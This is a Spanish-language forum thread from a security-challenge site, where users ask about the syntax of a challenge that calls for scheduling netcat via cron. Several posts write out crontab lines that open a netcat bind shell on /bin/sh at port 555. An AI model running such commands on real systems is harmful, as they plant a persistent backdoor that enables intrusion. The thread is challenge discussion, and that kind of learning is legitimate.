Bienvenido, invitado ( Identificarse | Registrarse )

 
Reply to this topicStart new topic
Aclaraciones, 165 - Time Machine
sky
mensaje 28/05/2007 07:48
Publicado: #1
Mención Honorifica de la Temporada 2011-2012
**



Grupo: Colaboradores
Mensajes: 77
Registrado: 15/05/2006
Desde: ~/
País: España
Especialidad: Vaguear
Comunidad: Yashira.org
Rank: OFF



los flags del netcat tienen que ir separados?
el formato de la hora 24horas o 12horas?es decir 2:00 o 2:00am
y ya lo ultimo en cuanto al comando inicial, busque y encontre 2..

xD
saludosss

Mensaje modificado por skyline2412 el 28/05/2007 10:19
Go to the top of the page
 
+Quote Post
musashi
mensaje 28/05/2007 08:04
Publicado: #2
Novato++
**



Grupo: Miembro
Mensajes: 24
Registrado: 29/05/2006
Desde: index.php?mode=Retos
País: Cataluña
Ranking : 11 º/ 719.03
Avance : 49.53 %
All Stars
Lenguajes Diseño WebSeguridadIngeniería InversaCrackingCriptografiaLenguajes de ProgramaciónMixMisiones ImposiblesSistemas OperativosEsteganografíaIngenioCiencias
Especialidad: complicarse la vida
Comunidad: p1mp4m
Rank: ON



Buenas,

Los parametros separados y en orden alfabetico.
Y para lo segundo, el que es como windows solo se ejecuta la tarea una vez. queremos que se repita cada semana. En cuanto a la hora, son las 2 de la mañana, no tiene perdida, no existen las 26 pm ni cosas por el estilo.

Saludos
Go to the top of the page
 
+Quote Post
sky
mensaje 28/05/2007 10:17
Publicado: #3
Mención Honorifica de la Temporada 2011-2012
**



Grupo: Colaboradores
Mensajes: 77
Registrado: 15/05/2006
Desde: ~/
País: España
Especialidad: Vaguear
Comunidad: Yashira.org
Rank: OFF



CITA(musashi @ 28/05/2007 10:04 AM) *
Buenas,
Los parametros separados y en orden alfabetico.
Okz pillado
CITA(musashi @ 28/05/2007 10:04 AM) *
Y para lo segundo, el que es como windows solo se ejecuta la tarea una vez.queremos que se repita cada semana.
Jeje tu crees? at 02:00 /every:L,M.....
CITA(musashi @ 28/05/2007 10:04 AM) *
En cuanto a la hora, son las 2 de la mañana, no tiene perdida, no existen las 26 pm ni cosas por el estilo.
Jaja si ya se q no existe 26 pm xDD pero por ejemplo en el reto se podria poner 2:00am 2:00.Ya esta todo comprendido (creo)

Moitass grrrassias (IMG:http://www.yashira.org/style_emoticons/Yashira/tongue.gif)
Go to the top of the page
 
+Quote Post
g30rg3_x
mensaje 28/05/2007 15:22
Publicado: #4
SysAdmin
Ícono de Grupo



Grupo: Administrador
Mensajes: 353
Registrado: 29/01/2005
Desde: /
País: México
Especialidad: fap fap fap
Comunidad: Yashira.org
Rank: OFF



CronDaemon no te hagas bolas es el que existe desde hace muchooooo tiempo y el que te encuentras en todas las distros las demas son modernas...
Go to the top of the page
 
+Quote Post
musashi
mensaje 29/05/2007 13:18
Publicado: #5
Novato++
**



Grupo: Miembro
Mensajes: 24
Registrado: 29/05/2006
Desde: index.php?mode=Retos
País: Cataluña
Ranking : 11 º/ 719.03
Avance : 49.53 %
All Stars
Lenguajes Diseño WebSeguridadIngeniería InversaCrackingCriptografiaLenguajes de ProgramaciónMixMisiones ImposiblesSistemas OperativosEsteganografíaIngenioCiencias
Especialidad: complicarse la vida
Comunidad: p1mp4m
Rank: ON



???
Go to the top of the page
 
+Quote Post
_GeMiNi_
mensaje 21/09/2007 04:47
Publicado: #6
Novato
*



Grupo: Miembro
Mensajes: 12
Registrado: 21/01/2005
Desde: queteimporta
País: Argentina
Ranking : 53 º/ 322.36
Avance : 22.21 %
All Stars
Lenguajes Diseño WebSeguridadIngeniería InversaCrackingMixSistemas OperativosEsteganografíaIngenioCriptografiaCienciasLenguajes de Programación
Especialidad: Salir a vagar.....
Comunidad: Yashira.org
Rank: ON



mmm para la primer parte del comando para programar ... especifico las iniciales de los dias ... como aparece q se debe hacer ...???

me quede trabado... despues del punto y coma va la línea que debo escribir para ejecutar el netcat ejecutando /bin/sh por el puerto 555

bien mis pregunta es debo poner la ruta completa de donde se encuentra???
Go to the top of the page
 
+Quote Post
Dinosaurio
mensaje 20/03/2008 05:42
Publicado: #7
Lurker




Grupo: Lurker
Mensajes: 5
Registrado: 11/06/2006
Desde: Chichombia
País: Colombia
Ranking : 1045 º/ 17.66
Avance : 1.22 %
All Stars
CrackingSistemas Operativos
Especialidad: *NIX
Comunidad: DragonJAR
Rank: ON



CITA(_GeMiNi_ @ 21/09/2007 00:47) *
mmm para la primer parte del comando para programar ... especifico las iniciales de los dias ... como aparece q se debe hacer ...???

me quede trabado... despues del punto y coma va la línea que debo escribir para ejecutar el netcat ejecutando /bin/sh por el puerto 555

bien mis pregunta es debo poner la ruta completa de donde se encuentra???


H0l@,

Que berraquera :@

Siempre que empiezo a hacer los retos, nuevamente me encuentro con la ambiguedad en la construccion de los mismos, puesto que o estoy totalmente equi vocado, O una respuesta para dicho reto realmente seria algo como

#echo 00 2 * * 4-5 nc -e /bin/sh -l -d -p 555 >> /etc/crontab

Segun como lo requieren en el reto estoy haciendo algo asi y nada :(

echo 00 2 * * 4-5 >> /etc/crontab;nc -e /bin/sh -l -d -p 555

Asi q ando mas perdido q el hijo de limber

Asi q si seria bueno q aclararan como debe de ir la respuesta


Thank


Otra vez sera :(


Dino
Go to the top of the page
 
+Quote Post
PerverthsO
mensaje 20/03/2008 16:58
Publicado: #8
2° Lugar de la Temporada 2012-2013
**



Grupo: Miembro
Mensajes: 97
Registrado: 30/05/2007
Desde: Peru
País: Perú
Ranking : 4 º/ 955.00
Avance : 65.79 %
All Stars
Lenguajes Diseño WebSeguridadIngeniería InversaCrackingMixSistemas OperativosEsteganografíaLenguajes de ProgramaciónCriptografiaMisiones ImposiblesIngenioCiencias
Especialidad: hacer preguntas
Comunidad: Yashira.org
Rank: ON



jeje primero creo q lles mejor la descripcion del reto ;) pero vaz por ahi (IMG:http://www.yashira.org/style_emoticons/Yashira/^^.png)
Go to the top of the page
 
+Quote Post
asimov
mensaje 11/04/2008 12:27
Publicado: #9
Novato++
**



Grupo: Miembro
Mensajes: 25
Registrado: 20/03/2008
Desde: Lanus
País: Argentina
Ranking : 42 º/ 348.21
Avance : 23.99 %
All Stars
MixSistemas OperativosCrackingCriptografiaMisiones ImposiblesLenguajes Diseño WebSeguridadEsteganografíaIngeniería InversaIngenioCiencias
Rank: ON



en este reto cuesta mas la sintaxis que el reto en si por ej: despues del ; los minutos se pone un cero 0 o dos 00 en la hora se pone 02 o solo el 2 en los dias se pone 4,5 o 4-5 y despues va esto ?? /var/www/imagenes/nc -l /bin/sh -p 555.

seguire probando...
Go to the top of the page
 
+Quote Post
[d-m-k]
mensaje 19/04/2008 13:18
Publicado: #10
Novato++
**



Grupo: Miembro
Mensajes: 21
Registrado: 30/03/2007
País: Colombia
Ranking : 101 º/ 214.92
Avance : 14.81 %
All Stars
Lenguajes Diseño WebCrackingCriptografiaMixSistemas OperativosEsteganografíaLenguajes de ProgramaciónSeguridadIngenioCiencias
Especialidad: ...Dormir...
Comunidad: RIC
Rank: ON



:O veo que este tipo de ambiguedades son las que lo ponen a uno a pensar... jejeje
CITA
Indica el comando necesario para programar el reloj, luego un punto y coma y seguido la linea que debemos añadir para ejecutar el netcat en el momento indicado
Go to the top of the page
 
+Quote Post
Leber
mensaje 25/04/2008 16:32
Publicado: #11
Lurker




Grupo: Lurker
Mensajes: 3
Registrado: 19/04/2008
Ranking : 808 º/ 26.39
Avance : 1.82 %
All Stars
Sistemas OperativosLenguajes Diseño WebSeguridadMix
Rank: ON



A ver, estoy algo confundido ya que creo que lo estoy haciendo bien pero no me lo acepta. Por ejemplo, para programar el reloj estaria bien hacer esto:

echo "00 2 * * 4,5" >> [fichero contrab]

Y bueno, el nc tengo una dua, ¿modo oculto o no?

Gracias de antemano
Go to the top of the page
 
+Quote Post
RuBiCK
mensaje 06/06/2008 08:20
Publicado: #12
Lurker




Grupo: Miembro
Mensajes: 7
Registrado: 02/06/2008
Ranking : 376 º/ 72.77
Avance : 5.01 %
All Stars
Sistemas OperativosCriptografiaCrackingIngeniería InversaIngenioMixCienciasLenguajes Diseño WebSeguridadMisiones Imposibles
Comunidad: Yashira.org
Rank: ON



He puesto el comando para programar el planificador de tareas;linea completa pero no funciona....

Sé que el comando para el planificador está bien, la linea también, pero creo que hay algún problema con las horas por ejemplo 02 o 2 y luego no se si el nc que hay bajo /var/www ya tiene permisos de ejecución o no... y asumo que estoy ejecutando los comandos como root...

¿Alguna orientación?

Editado: Para que le sirva a la gente, como siempre, es con los menos caracteres posibles :)

Mensaje modificado por RuBiCK el 12/06/2008 21:49
Go to the top of the page
 
+Quote Post
Dosis
mensaje 19/12/2009 17:10
Publicado: #13
Lurker




Grupo: Miembro
Mensajes: 6
Registrado: 22/07/2009
Desde: En cualquier parte de la red XD
País: El Salvador
Ranking : 112 º/ 198.16
Avance : 13.65 %
All Stars
Sistemas OperativosMixIngenioCienciasEsteganografíaCriptografiaCrackingLenguajes Diseño WebSeguridadIngeniería Inversa
Comunidad: DragonJAR
Rank: ON



salu2! revivo el tema ya q me siento frustrado por tanto banneo (IMG:http://www.yashira.org/style_emoticons/Yashira/sad.gif) ; la primera duda al utilizar el comando para introducir la tarea es necesario que lleve la opcion por ejemplo ******* -*;linea. (lo obvio es q si); para los dias se usa , o - estoy frustrado (IMG:http://www.yashira.org/style_emoticons/Yashira/ladrillazos.gif) sera que estoy usando el comando equivocado y es el comando que se parece al de windows o.O?
Go to the top of the page
 
+Quote Post
SitUAtE
mensaje 10/11/2013 10:29
Publicado: #14
Lurker




Grupo: Lurker
Mensajes: 6
Registrado: 12/08/2011
País: España
Ranking : 108 º/ 203.42
Avance : 14.01 %
All Stars
Lenguajes Diseño WebCrackingIngenioCienciasSistemas OperativosCriptografiaMixEsteganografíaLenguajes de ProgramaciónSeguridadIngeniería Inversa
Comunidad: Sinfocol.org
Rank: ON



Jo. Tengo el comando probado y todo en mi terminal con la ruta bien, con los tres parámetros cortos y ordenados, con la configuración temporal 00 2 _ _ _,_ y no me termina de arrancar... :( ¡Sé que es complicar mucho la marimorena montar un emulador de terminal por detrás, pero la verdad es que me desesperan un poco estos retos (¡aunque aprenda opciones y configuraciones que antes no conocía!)!

Anyway, nice one!
Go to the top of the page
 
+Quote Post
g30rg3_x
mensaje 12/11/2013 04:09
Publicado: #15
SysAdmin
Ícono de Grupo



Grupo: Administrador
Mensajes: 353
Registrado: 29/01/2005
Desde: /
País: México
Especialidad: fap fap fap
Comunidad: Yashira.org
Rank: OFF



Buenas,

CITA(SitUAtE @ 10/11/2013 04:29) *
Jo. Tengo el comando probado y todo en mi terminal con la ruta bien, con los tres parámetros cortos y ordenados, con la configuración temporal 00 2 _ _ _,_ y no me termina de arrancar... :( ¡Sé que es complicar mucho la marimorena montar un emulador de terminal por detrás, pero la verdad es que me desesperan un poco estos retos (¡aunque aprenda opciones y configuraciones que antes no conocía!)!

Anyway, nice one!


Revisando tus respuestas veo múltiples intentos diferentes en unos haces bien la parte de las fechas en otros bien el comando a ejecutar pero bueno como dicen arriba lee bien el enunciado (sobre todo el PD que es el que no estas respetando) ahora para la parte inicial la que configura la tarea usa el formato corto, ahí por ejemplo veo en tu "masacara" en la parte que se ve pusiste de sobra 1 carácter.

Saludos y disculpa la tardanza.
Go to the top of the page
 
+Quote Post
SitUAtE
mensaje 17/11/2013 22:57
Publicado: #16
Lurker




Grupo: Lurker
Mensajes: 6
Registrado: 12/08/2011
País: España
Ranking : 108 º/ 203.42
Avance : 14.01 %
All Stars
Lenguajes Diseño WebCrackingIngenioCienciasSistemas OperativosCriptografiaMixEsteganografíaLenguajes de ProgramaciónSeguridadIngeniería Inversa
Comunidad: Sinfocol.org
Rank: ON



CITA(g30rg3_x @ 12/11/2013 04:09) *
Buenas,



Revisando tus respuestas veo múltiples intentos diferentes en unos haces bien la parte de las fechas en otros bien el comando a ejecutar pero bueno como dicen arriba lee bien el enunciado (sobre todo el PD que es el que no estas respetando) ahora para la parte inicial la que configura la tarea usa el formato corto, ahí por ejemplo veo en tu "masacara" en la parte que se ve pusiste de sobra 1 carácter.

Saludos y disculpa la tardanza.


¡Gracias por la aclaración! La verdad es que me han vuelto a bannear! Jejeje. Mañana creo que lo volveré a intentar que ya me tengo apuntadas las respuestas que voy dando... ;) ¡Buenas noches!
Go to the top of the page
 
+Quote Post
Luis_1984
mensaje 02/04/2014 15:02
Publicado: #17
Novato++
**



Grupo: Miembro
Mensajes: 57
Registrado: 05/08/2013
Desde: Nicaragua
País: Nicaragua
Ranking : 9 º/ 733.32
Avance : 50.52 %
All Stars
Lenguajes Diseño WebSeguridadIngeniería InversaCrackingCriptografiaLenguajes de ProgramaciónMixSistemas OperativosEsteganografíaIngenioCiencias
Comunidad: Yashira.org
Rank: ON



tengo algunas dudas,la primera es que se a que se refiere la parte que dice que debo agregar el comando;linea agregar... lo he intentado [redactado] pero no se si voy por buen camino

(IMG:http://www.yashira.org/style_emoticons/Yashira/babas.gif) Reto Pasado Muy bueno

Mensaje modificado por Luis_1984 el 03/04/2014 15:22
Razón de edición: Demasiada Pista
Go to the top of the page
 
+Quote Post
g30rg3_x
mensaje 03/04/2014 06:23
Publicado: #18
SysAdmin
Ícono de Grupo



Grupo: Administrador
Mensajes: 353
Registrado: 29/01/2005
Desde: /
País: México
Especialidad: fap fap fap
Comunidad: Yashira.org
Rank: OFF



Buenas,

CITA(Luis_1984 @ 02/04/2014 09:02) *
tengo algunas dudas,la primera es que se a que se refiere la parte que dice que debo agregar el comando;linea agregar... lo he intentado [redactado] pero no se si voy por buen camino


Revisa la descripción del reto, sobretodo la parte de los intervalos de tiempo que se debe ejecutar netcat por lo demas vas bien.

Saludos
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
2 usuario(s) está(n) leyendo esta discusión (2 invitado(s) y 0 usuario(s) anónimo(s))
0 miembro(s):

 

RSS Versión Lo-Fi Fecha y Hora actual: 28/08/2014 15:41